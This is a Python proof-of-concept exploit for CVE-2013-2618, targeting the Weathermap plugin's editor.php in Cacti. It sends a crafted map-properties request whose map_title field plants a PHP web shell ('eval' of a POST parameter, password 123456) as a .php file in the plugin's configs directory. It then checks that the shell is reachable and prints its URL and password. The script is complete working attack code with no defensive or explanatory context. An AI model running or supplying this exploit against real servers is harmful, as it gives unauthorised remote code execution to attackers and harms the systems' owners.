#!/usr/bin/env python # -*- coding: utf-8 -*- # CVE-2013-2618 import hashlib import requests import sys import time import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) shellpass = "123456" signature = hashlib.md5(b"POC").hexdigest() map_title = "<?php echo @md5('POC');@eval($_POST['%s']);?>" % (shellpass,) mapname = str(int(time.time())) + ".php" payload = { "plug": "0", "mapname": mapname, "action": "set_map_properties", "param": "", "param2": "", "debug": "existing", "node_name": "", "node_x": "", "node_y": "", "node_new_name": "", "node_label": "", "node_infourl": "", "node_hover": "", "node_iconfilename": "--NONE--", "link_name": "", "link_bandwidth_in": "", "link_bandwidth_out": "", "link_target": "", "link_width": "", "link_infourl": "", "link_hover": "", "link_commentin": "", "link_commentposin": "95", "link_commentout": "", "link_commentposout": "5", "map_title": map_title, "map_legend": "Traffic+Load", "map_stamp": "Created:+%b+%d+%Y+%H:%M:%S", "map_linkdefaultwidth": "7", "map_linkdefaultbwin": "100M", "map_linkdefaultbwout": "100M", "map_width": "800", "map_height": "600", "map_pngfile": "", "map_htmlfile": "", "map_bgfile": "--NONE--", "mapstyle_linklabels": "percent", "mapstyle_htmlstyle": "overlib", "mapstyle_arrowstyle": "classic", "mapstyle_nodefont": "3", "mapstyle_linkfont": "2", "mapstyle_legendfont": "4", "item_configtext": "", "editorsettings_showvias": "0", "editorsettings_showrelative": "0", "editorsettings_gridsnap": "NO", } def exploit(target): URL = target + "/plugins/weathermap/editor.php" try: r = requests.post(URL, data=payload, verify=False, timeout=5) except requests.exceptions.RequestException as e: return False else: shell = check_shell(target) if not shell: return False else: return shell def check_shell(target): URL = target + "/plugins/weathermap/configs/" + mapname try: r = requests.get(URL, verify=False, timeout=5) except requests.exceptions.RequestException as e: return False else: if signature not in r.text: return False else: return URL + ", " + shellpass def main(): try: target = sys.argv[1] except IndexError as e: print("CVE-2013-2618") else: result = exploit(target) print(result) if __name__ == "__main__": main()